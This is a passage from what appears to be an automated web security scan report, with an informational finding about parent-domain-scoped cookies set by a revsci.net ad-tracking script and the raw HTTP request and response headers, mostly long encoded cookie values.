Set-Cookie: rtc_YjUU=MLvv+TMxJrhm57bv/Fuqg2mNrsYwJCwK+v7dHsmDb2IH8Z6qKwZuahTDDtXIW/Zj+Bka3uadtAsIrzjpxbUEOscrfkkoUKYGbbQo+GCjROUJQl4T4uztdiTfKoCJu0JcST7kTxGI7wsX+Qro7lxX17foIrA1qd1Nf0HSMYaH29l1JUQ8p00w8ygOQ26ZhJSo6BNhPgt1f/MyPBe0p9wtPYkf+djL2uU+TuznLtnPn4sfYYrCXBL6f08WnLyZ4Mm4O6NagBnnWPnDLYAz5Ml10TDT8REQDGXwDo9VRrMRR4uvxnLDERRsk1GGsr4NZMzrT6EkXpIEqOhWMuZ+QuscSFhSWdF16himAhxWk3NpqbtLRifpxDNqkEugiwq7EKio5yHmLXuCHqPLXqmVfZiFDtbdNyK2pPZeN7We+keVkFZ0hetlrVVYG3JmX6R4ukl1ZusiPOx3Qw4oU0u91k+Sr/M2eJycd+m80XK8Upy0DtU0A5EmxVmvRV3m7tFL5Q8+AX0Wr9D/HQpHIAb1IfBNY5YITgUaq80nAJwBn0n0htK+3O7+x3ZtE6xLOKBK13RLR8ERpR/LRa5FF3a9SEBdfIXBTuYDOdpikFej3r0qGeJ5Om0HEUeBjQlXvnJvLXc9p6KZIUzzAqF7YgHXr/ssjTtOvOMa/E+E17f7boO/vuSsT44TU4DGcZDudNpOHDIHDGAQr0bR9vVCwsK4hjh+QY8XDp1z/c5+CbXgmgVxrM4f3U9sZ0swN8/DxOvWTjiD9/uzE0lORuUQLnjI6s48lV7mkFriiLosH2vBtXPi/ydrIq+X/AmWwznCWnnkg5nmC3a8U8nIhXMUrA7jxqZedfN0/s0DkOdspMGmZeaiEtKRbbTDFfStmi5tGBZckkMM11qoTxhJSPMJaZLJ51wGknFfqtc1T3RtbQulHAkp+Ltlj+Muxy5K6G7IlPzGHrTE/LBMbadby1REIkbMXRcQjQNF3cgz6yJCgRJGS0SSj7g66Zla2w2ffnNUeWXX72YKpyoB4DZd6BIvwwr8x+pfqIQ63j4nZywNVhm6KvMzpsRpp0M0U40BluLMIpyt2VTRAe8UzEHTiXMcxIsbcjPTTyl+rVxA7uZxlpnUDFiAHCkQyNx8lDntem0IMN/TME6N+FbB2qZVGmqtELYHOSHbSCRfcCqY5UfhXQwUte8dptRoBhOCVkZNzF1TBPhAvvQ9zI6kJSCY64YG6KdLPDvyH8rS9z3qE2LHjIfgth44b/UAMzcgDXS2Ymj0kJ7Ir9eyKJ9JlW7lMOL/mPQtT+3U4eR6SKh6cL2OnpqEVSKgx0ECiLmWwjVn9JJhKqo/u/j4FYQXsO6TJy/rgMI6M69+77qN2OthiG7z3StQuyBoyPmU+dzshtM+jLpaaw8SUgxJtfhCs/KofRGhn04a957Um+FeEJGidW8K+I88fBGmvqBR51mSJTKUTsx9E8a9uYStaiofZNEaqevhA36RH9KJeJBkiowT1FCKA/MwpapC0qqBXVD27tjf2KNTkXzs2LEnwyRfMtACpu3Odskm6ZrhgD7muKTkInsc4QFj6gVXN2haKycJ2uynSSm+get4DcdWJnpS0UYIlrolebv9yQuFQMPkJNemRw6EDMIdg7BipgA8l8UtxfeO1Wr4hYQYwWj3TzQfWo5d95HeMqfDjULMLDn5qZciUs4Oc94YAZBECV1zyoU0T+brzU44LI9ZhN9R3/VxuPVHKmwA4tH3B7creYHjVcf2TpLSvIfhi+cW7F44rP5huqnEJ0jUD4clCALbI5sQO5sfqH60Bj9vaknO0OBhUtN3NoD1rgDvO/OOitGYDZnrNdgXL+G7xWqjnCB3G2VmLiyNgbNCDcNTjHSqdeG1AE4D23EZfvR6sb2sJpknNYuPmxnzj4/VsO9TaqoH+Oh/eJJwGO+VWFJ5Pcyexs/EHfkh2QrhqL27KSiE9YizXJS2nfZcvmcUWT8xMrD6KongMT82poOUH580aglgV3GZDHBxQm8D+VTQWNMk2FwbgNGI4vLRwIHZ8GEty7I74fyHw76rsiRrCSKJxMfVk9HqiKIjUwLuytBz8q1CkV9oQEoiTZ2o/9NbXQzfbRSnZo5cQbeTBLNvPsZFUgqZpAsKUOzzUpvPb1VEVli9/YDtKL04kVD6FS0pR/++4YUQiRO/4WIZZfMUa81tZeZTbxDHXviSXWK6nIBGRAZvHn7HTX9VOAFH0KJ8lYVkn9g/j4L97xdWkWWi5Iv/VhNcaydNycyzzfOmLCxR0t6DUEO1mJzQ/zf/t7MLT8NMeAFGyLmTM6rk6QFX3uOFFeY8XAENtaEcK8NytHL3CPo0sUvJvFaZX4YwpKgFUgojwze1TeDQD7vh2e7RKq6eYciVXHkH8jjPFhTliJBcBo9g4lYyYER2AU5pOYyAt2PEuDwTEeSy86Cvc51IVw9O/BYBGuZ4fc2GURzugBaY4PVF0qXTcR/3c1CA7bCkbdeY2h54U0CSdavrePhNL+/XNQpXVfojlsqvdK8LUYOyaN20Oevq+dZa2BQG/jVfhTNPjee6IClo7sjEOGnY8yELeMxKR3jkF7Cm0KfP+QHKtsYQoBBhbUe9iYqk8TieB5/8A+i+0Vs8O8d1R5BwCT49iHs1gnm3ezAwXJl8McadfzhCdI4V8qYCEo1rbSWCwsETSVEegCC0T6LQFHYlBRiJqMiOSzPk2DRjEcvhZrugeSi1Us+fOlU9CHzPb9QiOpEVaBcYaBR/IEa71WWQK6jXMY1SRjZzrRqiNfgTu6fYq/XIoxXezKHfIwOaiMA=; Domain=.revsci.net; Expires=Fri, 11-May-2012 13:31:34 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: image/gif
Content-Length: 43
Date: Thu, 12 May 2011 13:31:33 GMT

GIF89a.............!.......,...........D..;
8.61. http://pix04.revsci.net/K05540/b3/0/3/1003161/572935433.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /K05540/b3/0/3/1003161/572935433.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /K05540/b3/0/3/1003161/572935433.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.zdnet.com%252Fblog%252Fcomputers%252Fcan-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook%252F5773%253Fsite%253D2%2526ncat%253D6037%25253A13616%25253A%2526ptype%253D2100%2526_rsiL%253D0%26DM_EOM%3D1&C=K05540 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_I10982=bff01c00ddc153c5&I10982&0&4decdd8d&0&&4dc76d7a&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4decf25d&8&11797,12348,12360,12390,12566,12572,11854,50049&4dc75d7d&271d956a153787d6fee9112e9c6a9326; NETSEGS_J06575=bff01c00ddc153c5&J06575&0&4decf417&0&&4dc77286&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4decf45e&6&10124,10098,10078,10053,10100,10143&4dc74a5e&271d956a153787d6fee9112e9c6a9326; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4decfa31&2&10433,10524&4dc75824&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4decfa40&1&10009&4dc75095&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4decfa7c&0&&4dc76015&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dee240a&0&&4dc8b573&271d956a153787d6fee9112e9c6a9326; NETSEGS_J09847=bff01c00ddc153c5&J09847&0&4dee247a&0&&4dc8a2b6&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4def8d7d&5&10011,10030,10070,50085,50150&4dc8d181&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4def8f97&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dc8d904&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4def8f9d&1&10592&4dca02d1&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4def8fc2&0&&4dc9f632&271d956a153787d6fee9112e9c6a9326; NETSEGS_J07717=bff01c00ddc153c5&J07717&0&4df0a86e&0&&4dcb3d30&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07707=bff01c00ddc153c5&H07707&0&4df0a87c&0&&4dca5d68&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4df0b07e&0&&4dca8ab1&271d956a153787d6fee9112e9c6a9326; rsiPus_qbvO="MLsXrrEOpxpv55DW8tahZ2a57v4BlC60cICOgIfdHU7gwI+bhP0TqX40neBrVzd04YF7hotNL+h4vvc66tVVUjceSeakCP8FKl+7vpw/cPKd8tMu3PMCPoyxK8+ZjwDWyB3QMrpomCL0QiC5Kvy/YgnB8KTN7G9dLpnN5M3RK+PP1zwMehHWmM2JccWRv5ZmhNfQmN/YDBU94E+biCIoa0pKkv2eA2x+zJ1SCIL380rO+L9Lk2iLRCLsePDloY4CaZKvkWcnHN4spMzHQnUA9nMhOsrooPww0kmF/1pBhtUOQIGwwBNshy3r9jL9DmeVgwo+si4cw2GLg+UiObBCYgDoqFuF17tgWtie8ndkcM4/dxQZHmAVAFp6Cd4+NKEDE1ApHgzdWMCRN3mtXvTF3dagjo97ZcxX3TK0H5gNZL/tX25K+rZRwN8wPyK9oLx40INCM6m5859n+iEwb4c3uHEIWIExaGsanUSO3meucYKt8SqtiIB1ZKfcV2EWnE5l0JI9ym05H0J1D++1YxD2YWIf3FMp0ODLJXHC5LJl8HAXM9kRR0eUwpIWZ43I4Sxu/ghMwCqycSGD5P5qCz+NfB7cpFNnCm/MZxXAtHhkwlvld7DwvFMTxzkmteonO6+tWDCvSgxfKLeBCsnh7/g2pdMlW86tZQUhX+5vIkdTKTAbn/ygJRg0T3sdyAIGgf6VindVNH18jDokISc3IGyw/B24wJC4km6cNzLCqq3zgXP3vffJqf4px62L8VMyvj3CaMObL1w9lE2lhd4iKvN3GccP1FcTweH5kHDsZZBw7FHK1W7K9ytiQtKzGQRCBtx0rurYuoXmj+tBMHYIGgQGQbpACUKiwMwgO11XDJXNsqWXOeTs409iMvRAAhFR3MmxY/Ai8JtqiI6b0Q1+g1WTMqPGi0honF4/t46uL9iK78Kt/amFrG5zPGbmiPmMFkLKl9wLroTlxm+6qkNbYbThc0/QKEKH9b1zlGLxfdlc3hqznACvxpp0ybDR66WjOYSYr5GJsa1Cu2wcBHbKR1AxsYBzoLba+u6l87gczye8xuTrYhFfwlnHydy7IYalgPJBk32vZgWW2CXqypZtqnwMKkA2NoSDvvRLOZsd5s2E5nriVmz0A020hMNet6ezR0BbsbFJkikbhD25+D5hxe38KqYGvD586gb8nEzI0j5isfTJ/lkLrhbQFBZeshLI9NVhvhrxY3ujvMVlKz2TG/zsc7BVzk9fFPtT7mgROfudWRI+VvwrnXNE2vCSQzOJZeEAKPJctLVBCeeH5f0I+bMVOeVLPDBFeBnbAN+UOthqW+XB3wOga/8nLvsjoupDcwH+hneOk/D89Naxn/NKF3MEN04OWc1SJ6wrzqU6VhG4EvS+Zv+fJ8Gt98W7PtFLVLD0oQ=="; rsi_us_1000000="pUMV4ylDPxYY7RUCt3RYS68XU2Z/uOqvJR0SNgYO9rFAJiyyAu+FxS1Z30ODwyEFcoEx3T1Eetffz3Mf20XkwCrwYFLZZJxtyzGTJat2XTjlIN8P+hQPSL5K9zsL+kusRTvgKYlhihBhqZKK6GKen73oVAV9BWGkbl//D/fTGMFsID28cq6D7duOtAY3S7ThixmzbEOMxOHaa0VO3cDkKGVKS9qitOaUYlvgkLY1MKDOtODLrFUkILMlSRpCe7+47YCa4Yvgfmntw+kxPheKq6wDe8Fd8gOqjo+YsYcbcBetJ/UlUtydzNb+VQfdT8dEj/2h41IZ5vmY/5vsAZW1gUJs43Y9iklV1tAb9jY/G3Rk4zy39xByfOtBbqnZZm8zU97WhpjXwdwTrCSEuJ4CNdY/fhO3f+aPVPTKG9RnYRL0QJ4kFGhThODFPtf76e2qY1SQ9slSHrnY01CTJTrHMxySjJKQAVAr1obI8ilzYsPlaT1OSvYVS9TK9PoGrO5Jx5bXw/zwwE6Wrxwt7KjBiQjMb8pc2/6daLQ71r2XwEeaREz3clc3XYbmXIZKYmXXjpSqe6jB0kwcSkFst/ViDZpkDsFltV4ci5YQ/eJMqmyKrF/0uup6pq93xJKQibeBPvkCxBjBIGLPE6+meOzdSPUPxAyoXPah9kyi7C70w/Ic06E82HDgxMfptenJH+QxMcJPPGsyFAVT+6SBuOjuKJ5KYDNUBXyxL2dg7B2oqDAiqh1W+megWtR3XoJXxE+b3k70BKlvT5YvEuZ0/RALqrZKe/52guDCx1yv8IEqB3NuIb5M9E0P1eLplz4HhYGMt1XJa6PPDxd4ljqvSFEQClJtagh9UzDEFg6Cb5LdDadrKiwtHRl62r3F/lJB8Wq3syJAxzEPLO4bM0VnXvq5faJnoE+6gBD5yjyVDaOWRfQzLGIWkNHa+f2KJvAyTQlC4oHYQZOGM/cVc3WrnRQmj1KDwCk/46Dq6gu9fFpETdaKz7DpE5AVcVASeUiRu6t0E9gdbxRFlQnHfQxlj0O0yv/8sVDJfLtBv7VEv6KvS85d/vyrS+3/lJtowlLX877yZqlnDrYhsgIzJ/B2kGU/Y2tWcJtJNzrSLvL6uC6zAE3YCN+2b8ZfetlvToWWUxLm+kOAX5sNQa84+z+Y7BiXKA28ArWYuR2BzhZYqV+lNsl8IuYWHrQEhBevE6yTgfXBfZ5ZWDuef3muciM4uxq9eRevsktzwd4ZolhUro4q9RDXzP+z/Jt3SlkekF3F1UyZn5rEt9sK3VhPrPz7bFs0pGO/fShWwUhEJGkkGofDmr7oO9xVS0wlWlGR+HiZLLiNXtFztdl/InifBdzZrv7tEgPT/Ekl1qqx4lzM76Hls1fjGRalSthbIGWedXoj3t9T64fqUJnYWdom7ygUV4OI6Uek4g2aJV2sE2HBrV7ibQMfkHW6H2qlf/AvGzXk5juIW8AOsU6N3bJugxzerwleYqkN4SEXHO2TsUUB2Hii30ULmVN5KVwl4AT7t07WbQfIgUgh+J4zgAJSZ1//mvY7cAo2t7r+WZ+3UqK9EVFlB88NDlOgh4Jm3SdKvwyEx2VIxC8FQZezWpUIHfmHUohseSJ3s3QYI0FyZt+UimHMdHcAt0unq75eibm7XCXgvJjZ8QEa2uTso9gthoSRwjtm4zJD8KuDs9Dol9dL10gwkePtd9XjMMl1IiMfHEGPMzYrTXatfWNnptioKHatYztwbz3JzwC1e1SaBMwSq2wE51biaKnVTIX7gjw1dfMUEcH+SSwe4EKfaZDW3Y8jNtoFzFv7v+gK3Q=="; NETSEGS_E05510=bff01c00ddc153c5&E05510&0&4df0b096&0&&4dc9f625&271d956a153787d6fee9112e9c6a9326; udm_0=MLv39CEJZjpv597JwHIRxS7gdG4nwPAq6ZuDH+vX93uE8x+80+EqavgLMjsVMcRzx4ED/5sU/DdHAgOy6ZFF6u9krYB07BFG6K2gCx9zATNAOyKPGfTqVHvkpDwSF+KJXhEbXYpBgIjd3IWX3TqLfPz6jE8vTUf3pdaWUiZB3YUWt0CiIC5F0X3tPgb/SivyvtveJcRXnIKv7kXwRgYvCvr55V+AZTEVXPZ4e3YCovCIOgMpRBSkPQefrNyf8+fevxeSnnxLtLBTd7bn/zQn98TJd0YWeOHbFIVzmnJlL/meZ5F8yEzm7HiS+gYXKCqjfBEgEJXe7pa4nhHi/FyghIrWjtv72jtBRuTmEa1PtCcp9wfqOSXME/TC3DDlgc0Ij565ULgb+NLzIZ6TpI8vIyqOkYR2CJSFdZdVnBUG0ncgAuL4be/4qG/lpeLJAr4R2ZcdSh9ENtyBu0UsstxyoNHHwBT0SxG1olEQxWdxat7mSTK4NzNH7bvJyyZeNxeZoviFwczbub9BMnSayVKnrf8mLmZYn0G+URiIr9to1aqeDG6xKYVAmQwGVEGKynGOyuqpwObt+MyvmywUWEZ1qy3YzLOSZi95dlvgQqf5nm2jI0E/rWzPceCg9nrDXdY5aA2KiG6/Ag/Qtn9BE0P6tHnl8GXHStyZrY4yXNhIUbljw44dlYagYpCHt4M3J4bPZG8YwZUp0ecARePUDtezFyfvRsc1iatb1pDP+cq/6Iul6LmWpIrzCvxlo9THyXVf5SG33tg9Lw2R/Ro5VrxlHAMqi5EG0xBZZuKHWEnXQrAXGw8FaURhjx71p9CkHtHT1BpsJC15G4HDCuuHnAqa2MRPkYaEZL2cVa7b84SiSmL76sma6ZAVTmsWibG6oMtgf+rO6uurjCoZJ5OCsW83NGfMcjZCzPl33xUGXappEWzObGyaUvOz7ose722NuQ6CgmfMlORcS+CfKwXULjWH6Zy36QCvGrnsM/T/4K0FLlEQnA/ZrpS8O/uyK8UlrSZbknpF5SKlqTmNy5yEGuQ4SS+qP+oPyRgWbGkd6TLhbS8wVZYRN53ZAc0jxNNVRDNVFRE9QSI2VrlZ/Ka1RizjzXzy0Mrq6kcHNlCK91uDwhC94dfZh3mu4LEbkhOgwvScvmwGeZy8gGWoQEjk0gAgb9SgQmtGBl5C+T7TrdHq6EejqJkS0OH/st2RxRBZGNqPJSPFO3Z9nkwH7dr0G89yU1lVThr9TPeyrKuuQlOnafjtcNVr+buGb3emJOGcjzfH90v2UdAQiKm9gZ6BDbLaq/nbVWxP/5HqWbZLa2/RS2GM94ibxZPKXwTQTSnoK6758zl7N8nLPQGrb7mauaNrJ0v4zNciOQWnVNzZaqhQO8UVgcjuWrUQiJTPQWDKxu4w8eoM53ZEdNIh7WnKbwDRVqkqD0y1KsGwOeg2fZkSaLcNFed69lS3DYgh37CBN1ozAybkSybs/DUjRL93JTQZlPIkdLkbJkhmGdhN2G2Xb4uomwrwx4xxkHDHG3BOj3sObWJNvojJs1Id/pPS2nPanvOm; rsi_segs_1000000=pUPF4kmhOHMQJvAtY6gq+mkAZPosg7ZjSjmgIGbYEtpU+w6+9L4ioURjDVUZb5s2bJaZJyc3lSTsOodoc+LzjgnPXWfftsdz6As2U+S4m3sZ93GnJHkwYOujESwdtKPV2XiklIXPPxY08/+jghS00wcrqZXadzeLZbfrn9ShlwBQ2xmbpA283BtMERrEkp0Jl7AlGaEi8uw/pmdbkTDTCxPk3RxS+r7mTK51H+dLGRbW1fSty/wzVcn4GiBJEhk/0uP0JFLwQAUiAigtm0ZNVycI9AGE/kbo+Gm2GaMwx2IDZVAxGSGKhVfyxDow7LMEpP+/5AxB2aqXpAeWvKTgzd0wbPD0VLITZHo4oKcp6znXDZ/0QtZDxMyG+eh98ur0yF4RcpWqIFje74P6+IbKGLCNtlrtWjwe4OKLvE7KtEgbkcPkFFEShWCdZOSVCnDDkQcZ7HqnUdiwoMeOl35blI92a8QslLUelxYP8/7ksRF/dL4tgXNSVaB+tc0Q5yCGeoBCNTt3rHulcarLm9u5vCWFGW2APunE21aEXgSBAE52Pz5NcqBzMbUN/aEDea9hT+n/3Y/e5hgqyzCkCuGvIG755LivtanLgcg2kcQ5uwmgC0vJQMjRNKX40aTX4VArAzArEgBdkaBkXfsvkFD+Nbxz+zvek4KSXCepFAowCLMZjznkiJClqCAqKRQUoG7+ayD2Ys4bs0RrCwTlot+9B1Fervh4516lHDTrQVdcQIQ5uu++FItEtxejK+cd66ciMtQpvPlEfyhWIHOWGVBeyuJu+FtYTiNAvtNO6ZKSdLQTUzHI1ezwsB4RXs2oHFesxvqomNGH01i4; rtc_IJp3=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

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_IJp3=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF4j+huXIMH/C1v6FY5BBdG2vMpqLhiqlfIGbg2pRiGwm2jLwjIZFNNncjloepKzF/B7fp/+SGbJ0yOXZRv/SaW/3lnUiep5Wav6gSjI2qPUqvUeEgbXlkljVT5OJvnSM1QD/k1XGhHkLUgfDglqsHphQF5RNoPPQUAF5zPe4lmqdb0pMuX7OErKty73eO7VPRKP4SkMz9h69umDslc8X2k9YIFEpamQE3KkuWZVdOA47VPINA6sBSWNPcu3jrE7S3pwZWROXhL9ToMj2DXxcL5QgH/YgJiEygnml4lEvpTtSueJcovSe08Bg0wMJUtyeYpE6KxA2zWEIWRtpOJGA/4rrMOTqSsyhAm1OFKTyBFA1lWo/jNAIX9E0+kluhiGx+EoEXZLjgE/WZK1aE9LcrLHH5fAvP+LWMvROLT3q0k7D4aI07ndYt27eHzLjyqXzGn/ckSL4FPfyQnQaUZ8A0orIO5lgO/pclG68MCquKPs3SWm+3+BzMoovCp+CTFVg2AhkIfWcnkIBDsEuyA6zOwABxZch6m8H9VESGBon2H48nWYP+psMh/njHmeMGo3omqHu6dHwvDkDgv3aQHiMFugRfn19oMaPXXjd3052zpCDD2uBRSWPtZs8ixmSzWKaoGrXp95UwHZQb/iFFUtTVFBIs5dbfZf9yxzYnY8ydmZHlAeWae/wzNYBRyFV4lyZWY2g0Z4uA5qQo5eJ02NWW9DfErzyizP+5KatKpgPviQZynyDaDTF3+Fa5WTnZzvfcW+4JuA8jw5b5+Cf7HWhNfjlqRgZQHjkXx+D3QocR+1TryOZ10kLFbuX1po9skn8xOrmIC9tGqvo=; Domain=.revsci.net; Expires=Fri, 11-May-2012 13:28:27 GMT; Path=/
Set-Cookie: NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4df0ca7b&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dca0a20&271d956a153787d6fee9112e9c6a9326; Domain=.revsci.net; Expires=Thu, 09-Jun-2011 13:28:27 GMT; Path=/
Set-Cookie: rtc_-vpp=MLvv+TMxZohq566eiyx8oAYSlbBJXqZs3VrvxboqqCP0VA5Csf2kR5TCgtTLQ/Zl3CEgEOBy2a5SSDZhd+muYTl5LgLHlQc1XzR0ZjFkB2TqggOdBHszlEsRgzRHAx+4tRgEEKr7348XW6dQrBxXAd+n4+gCC0tmMDSpBNClzU8/av9iVPYj21n12LpbrUTHYyO8TwCqAtePIgX0FDuVyRecjRvr0aRHHddEVfjYqEDae+qlVJ67V2LO/JaZnmc4D/sSvT6uk617q3Z3k4GG97intR7F5AAijPUctoew/FScrMTYp8zhh0OBu0Wt2U2Hh4pVLAvUwFPL5FQ4tFMUdTYMy6p0pQhJGKfLViH+LlovFF1solZqGuRbS+u5QVbKflZHf04YsFV1ntZ5g5il3fzlBxDeIA8daqcfNLgywreNnkWs1cvC6KRmM+J5lIG7auaRoOkwAbZ8K6L7VUv4Dl3wKz+ridwrARWQ6RyVO5AT3LrSnBex/n9H3ESjRiRSDJSxGbNPGwmnQ1snuBunyq5FlqsDwipTqL2Du6yZrRiTwUSA3xJS6oI4OW1KlAt2y3m896sGHOtIv/GJbaAnESDmBzBZFIb2DuKYqlJb+upSj3NxDgZH0tQfTfs1enBsav5Ug8Yeuxq4NSoo7Kz0J5okUOGDWvJPIvlauDiVvauvyU+eRAeci0aHbMCID3N8EDFjHL5LiTkbKpmzQhALc9n0Z8ihyJ91yhKGhWcmECPsCsyCheXPLMX1ms6gMFePGzcA4NqXGustqfqOlTWiAGjBU5HouFWwvtKz2HVmYzySMv6CDqPQB1ooGlyBUcdm9ieiOLg+sSYXZnSO5grUlMiietLvFZ1TbCXhRT5s4N8Y+XEL2wGDFgt5nkUGHqdnisa/EKWm5uQ+COfuR33FaoWmGx6GbgKoMUg79fIxQQSAKtopCS2cTz8WCIMXUgOkcfmyiOG0vJ1VbiAPDei+o6tW56d+